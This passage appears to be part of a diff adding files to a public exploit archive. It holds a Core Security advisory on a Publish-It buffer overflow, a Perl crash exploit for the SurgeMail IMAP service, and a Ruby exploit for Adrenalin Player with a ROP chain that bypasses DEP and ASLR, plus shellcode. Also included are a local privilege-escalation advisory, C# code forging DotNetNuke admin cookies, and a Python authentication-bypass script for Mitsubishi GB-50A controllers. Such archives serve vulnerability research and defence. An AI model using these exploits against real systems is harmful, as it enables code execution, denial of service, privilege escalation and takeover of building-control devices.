Tested on CTERA Cloud Storage OS version 3.2.29.0 and 3.2.42.0
 
#SOLUTION
The vendor mark as resolved on latest CTERA version 4.x
 
#CREDITS
Luigi Vezzoso
email:  luigivezzoso@gmail.com
skype:  luigivezzoso

189
platforms/windows/dos/31461.txt Executable file
View file

@ -0,0 +1,189 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Publish-It Buffer Overflow Vulnerability
1. *Advisory Information*
Title: Publish-It Buffer Overflow Vulnerability
Advisory ID: CORE-2014-0001
Advisory URL:
http://www.coresecurity.com/advisories/publish-it-buffer-overflow-vulnerability
Date published: 2014-02-05
Date of last update: 2014-02-05
Vendors contacted: Poster Software
Release mode: User release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-0980
3. *Vulnerability Description*
Publish-It [1] is prone to a (client side) security vulnerability when
processing .PUI files. This vulnerability could be exploited by a remote
attacker to execute arbitrary code on the target machine, by enticing
the user of Publish-It to open a specially crafted .PUI file.
4. *Vulnerable Packages*
. Publish-It v3.6d for Win XP.
. Publish-It v3.6d for Win 7.
. Other versions are probably affected too, but they were not checked.
5. *Vendor Information, Solutions and Workarounds*
There was no official answer from vendor after several attempts to
report this vulnerability (see [Sec. 8]). As mitigation action, given
that this is a client-side vulnerability, avoid to open untrusted .PUI
files. Contact vendor for further information.
6. *Credits*
This vulnerability was discovered and researched by Daniel Kazimirow
from Core Exploit Writers Team.
7. *Technical Description / Proof of Concept Code*
Below is shown the result of opening the Proof of concept file [2] on
Windows XP SP3 (EN).
/-----
EAX 04040404
ECX 00000325
EDX FFFFFF99
EBX 77F15B70 GDI32.SelectObject
ESP 0012F5D4
EBP 77F161C1 GDI32.GetStockObject
ESI 0103A1E8
EDI A50107D3
EIP 04040404
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00000212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 00000001 00010002
ST1 empty -??? FFFF 00000043 004F007A
ST2 empty -??? FFFF 7590A3E7 FDBDC8F2
ST3 empty -??? FFFF 00000043 0050007B
ST4 empty 1.0000000000000000000
ST5 empty -9.2233720368547758080e+18
-----/
The arbitrary value 0x04040404 is stored in the EIP register where our
shellcode starts (just a software breakpoint 0xCC):
/-----
04040404 CC INT3
04040405 CC INT3
04040406 CC INT3
04040407 CC INT3
04040408 CC INT3
04040409 CC INT3
0404040A CC INT3
0404040B CC INT3
...
-----/
As a result, the normal execution flow can be altered in order to
execute arbitrary code.
8. *Report Timeline*
. 2013-12-20:
Core Security Technologies attempts to contact vendor. Publication date
is set for Jan 21st, 2014.
. 2014-01-06:
Core attempts to contact vendor.
. 2014-01-15:
Core asks for confirmation of the initial contact e-mail.
. 2014-01-15:
Vendor sends an e-mail with a single word: "Confirmed".
. 2014-01-16:
Core sends a technical description and asks for an estimated release
date. No reply received.
. 2014-01-21:
First release date missed.
. 2014-01-27:
Core attempts to contact vendor. No reply received.
. 2014-02-05:
After one month and a half trying to contact vendor the only reply from
them was the word "Confirmed" and the advisory CORE-2014-0001 is
published as 'User release'.
9. *References*
[1] http://www.postersw.com/.
[2]
http://www.coresecurity.com/system/files/attachments/2014/02/CORE-2014-0001-publish-it.zip
http://www.exploit-db.com/sploits/31461.zip
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2014 Core Security
Technologies and (c) 2014 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

34
platforms/windows/dos/31464.pl Executable file
View file

@ -0,0 +1,34 @@
source: http://www.securityfocus.com/bid/28377/info
SurgeMail is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the affected service. Failed exploit attempts will likely result in denial-of-service conditions.
SurgeMail 3.8k4 is vulnerable; other versions may also be affected.
#
#
# Surgemail stack overflow PoC exploit - latest version
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# http://www.infigo.hr/en/
#
use IO::Socket;
$host = "192.168.0.15";
$user = "test";
$pass = "test";
$str = "//AA:";
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "143",
Proto => "tcp") || die ("Cannot connect!!!\n");
print $a = <$sock>;
print $sock "a001 LOGIN $user $pass\r\n";
print $a = <$sock>;
print $sock "a002 LSUB " . $str x 12000 . " " . $str x 21000 . "\r\n";
print $a = <$sock>;

127
platforms/windows/local/31386.rb Executable file
View file

@ -0,0 +1,127 @@
#!/usr/bin env ruby
# Exploit Title: Adrenalin Player 2.2.5.3 (.m3u) SEH-Buffer Overflow ASLR+DEP Bypass
# Date: 3/2/2014
# Exploit Author: Muhamad Fadzil Ramli
# Vendor HomePage: http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
# Software Link: http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
# Version App: 2.2.5.3
# Tested on: Windows 7 x86 - Version 6.1.7600
# CVE:None
# Notes:-
# Offset to kernel32 - 0xF8C
# Offset to virtualProtect - 0xC039
filename = "motiv.m3u"
rop = ''
rop << [0x10129df6].pack('V') # PUSH ESP # POP ESI # RETN 0x10
rop << [0x10135eaf].pack('V') * 5 # RETN
rop << [0x1010c4c2].pack('V') # ADD ESP,20 # RETN
rop << 'VVVV' # VirtualProtect()
rop << 'WWWW' # return address
rop << 'XXXX' # lpAddress
rop << 'YYYY' # dwSize
rop << 'ZZZZ' # flNewProtect
rop << [0x1024bb98].pack('V') # lpOldProtect - writeable address
rop << [0x10135eaf].pack('V') * 2 # RETN (ROP NOP)
# kernel32 address
rop << [0x1003de9f].pack('V') # PUSH ESI # POP EAX # MOV EAX,ESI # POP EDI # RETN
rop << "AAAA" # FILLER
rop << [0x1005de8e].pack('V') # XCHG EAX,EBP # RETN
rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
rop << [0x101201d6].pack('V') # POP EAX # RETN
rop << [0xFFFFF074].pack('V') # OFFSET F8C
rop << [0x101111e2].pack('V') # NEG EAX # RETN
rop << [0x1013a5e4].pack('V') # ADD EAX,EBP # RETN
rop << [0x1010010f].pack('V') # POP ECX # RETN
rop << [0xFFFFFFFF].pack('V') #
rop << [0x1012dd87].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # ADD EAX,ECX # RETN
rop << [0x1012014b].pack('V') # INC EAX # RETN
# virtualProtect Address
rop << [0x1002660b].pack('V') # XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
rop << "XXXX" * 2 # FILLER
rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
rop << "AAAA" * 3 # FILLER
rop << [0x101201d6].pack('V') # POP EAX # RETN
rop << [0xFFFF3FC7].pack('V') # OFSET C039
rop << [0x101111e2].pack('V') # NEG EAX # RETN
rop << [0x1002660b].pack('V') # XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
rop << "AAAA" * 2 # FILLER
rop << [0x1013c584].pack('V') # SUB EAX,ECX # RETN
rop << [0x1010010f].pack('V') # POP ECX # RETN
rop << [0xFFFFFFFF].pack('V') #
rop << [0x1012dd87].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # ADD EAX,ECX # RETN
# assign virtualprotect address
rop << [0x1006798b].pack('V') * 8 # INC ESI # RETN
rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA" # FILLER
# return address
rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"
# lpAddress
rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V') # RETN FILLER
rop << [0x1014b57f].pack('V') # ADD EAX,100 # POP EBP # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA" # FILLER
# dwSize
rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V') # FILLER
rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
rop << [0x101201d6].pack('V') # POP EAX # RETN
rop << [0xfffffcff].pack('V') # 300
rop << [0x101111e2].pack('V') # NEG EAX # RETN
rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"
# flNewProtect
rop << [0x10117105].pack('V') # PUSH EAX # POP ESI # POP EBX # RETN
rop << [0x10135eaf].pack('V') # RETN FILLER
rop << [0x1012014d].pack('V') # XOR EAX,EAX # RETN
rop << [0x101201d6].pack('V') # POP EAX # RETN
rop << [0xffffffc0].pack('V') # 40
rop << [0x101111e2].pack('V') # NEG EAX # RETN
rop << [0x1006798b].pack('V') * 4 # INC ESI # RETN
rop << [0x1010eac7].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
rop << "AAAA"
# Execute VirtualProtect
rop << [0x101263a0].pack('V') # XCHG EAX,ESP # RETN
sc =
"\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52" +
"\x56\x64\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E" +
"\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C" +
"\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45\x75\xF5\x0F" +
"\xB7\x54\x51\xFE\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\xCC"
xploit = rop
xploit << "\x90" * 256
xploit << sc
data = "A" * 2176
data[24,xploit.length] = xploit
data[2172+4,4] = [0x100d7aec].pack("V") # SEH - STACK PIVOT
File.open(filename,'w') do |fd|
fd.write data
puts "exploit file size : #{data.length.to_s}"
end

65
platforms/windows/local/31460.txt Executable file
View file

@ -0,0 +1,65 @@
?
Asseco SEE iBank FX Client <= 2.0.9.3 Local Privilege Escalation Vulnerability
Vendor: Asseco SEE
Product web page: http://www.asseco.com
Affected version: 2.0.9.3 (Build 22.06.2011) - Desktop/Enterprise Edition
1.2
1.1.5.1270 (Service Pack 5) - Desktop Edition
1.1.5.1247
1.0
Application download resource: http://24x7.com.mk/Download.aspx
http://www.24x7.rs/eng/content.asp?idmenu1=23&idmenu2=33
Summary: FX Client is an offline application for e-banking that is intended only
for legal entities.
Desc: The application is vulnerable to an elevation of privileges vulnerability
which can be used by a simple user that can change the executable file with a
binary of choice. The vulnerability exist due to the improper permissions, with
the 'F' flag (full) for the 'Everyone' and 'Users' group, for the 'RichClient.exe'
and 'fxclient.exe' binary files making them world-writable. After you replace the
binary with your rootkit, on reboot you get SYSTEM privileges.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
Microsoft Windows 7 Professional SP1 (EN) 32/64bit
Microsoft Windows XP Professional SP3 (EN) 32bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5168
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5168.php
CWE ID: 276
CWE URL: https://cwe.mitre.org/data/definitions/276.html
10.01.2014
---
C:\Program Files (x86)\PEXIM\FXClient>icacls RichClient.exe
RichClient.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\Program Files (x86)\PEXIM\FXClient>
--
C:\Program Files (x86)\Pexim Solutions\FX Client>icacls fxclient.exe
fxclient.exe Everyone:(F)
NT AUTHORITY\SYSTEM:(F)
Successfully processed 1 files; Failed processing 0 files
C:\Program Files (x86)\Pexim Solutions\FX Client>

18
platforms/windows/remote/31465.cs Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/28391/info
DotNetNuke is prone to a weak encryption vulnerability.
An attacker can exploit this issue to decrypt sensitive data. Information obtained may lead to further attacks.
This issue affects DotNetNuke 4.8.1; other versions may also be affected.
// Step 1: Generate the two FormsAuthenticationTickets
FormsAuthenticationTicket ticket1 = new FormsAuthenticationTicket("admin", true, 10000);
FormsAuthenticationTicket ticket2 = new FormsAuthenticationTicket(2, "admin", System.DateTime.Now, System.DateTime.MaxValue, true, "Registered
Users;Subscribers;Administrators");
// Step 2: Encrypt the FormsAuthenticationTickets
string cookie1 = ".DOTNETNUKE=" + FormsAuthentication.Encrypt(ticket1);
string cookie2 = "portalroles=" + FormsAuthentication.Encrypt(ticket2);

44
platforms/windows/remote/31474.py Executable file
View file

@ -0,0 +1,44 @@
source: http://www.securityfocus.com/bid/28406/info
The Mitsubishi Electric GB-50A is prone to multiple authentication-bypass vulnerabilities.
Successful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible.
# you can get BeautifulSoup from:
# http://www.crummy.com/software/BeautifulSoup/#Download
from BeautifulSoup import BeautifulSoup
from httplib import HTTPConnection
import sys
ip = sys.argv[1]
template = '<Mnet Group="%%s" Drive="%s" />' % sys.argv[2].upper()
def post(data):
c = HTTPConnection(ip)
c.request('POST','/servlet/MIMEReceiveServlet',data,{'content-type':'text/xml'})
return BeautifulSoup(c.getresponse().read())
# first out what groups there are
soup = post("""
<?xml version="1.0" encoding="UTF-8"?>
<Packet>
<Command>getRequest</Command>
<DatabaseManager>
<ControlGroup>
<MnetList/>
</ControlGroup>
</DatabaseManager>
</Packet>
""")
group_nums = [(g['group']) for g in soup.findAll('mnetrecord')]
# now go through and set all the on/off bits to what we were told
soup = post("""
<?xml version="1.0" encoding="UTF-8"?>
<Packet>
<Command>setRequest</Command>
<DatabaseManager>
%s
</DatabaseManager>
</Packet>
""" % ('\n'.join([template%g for g in group_nums])))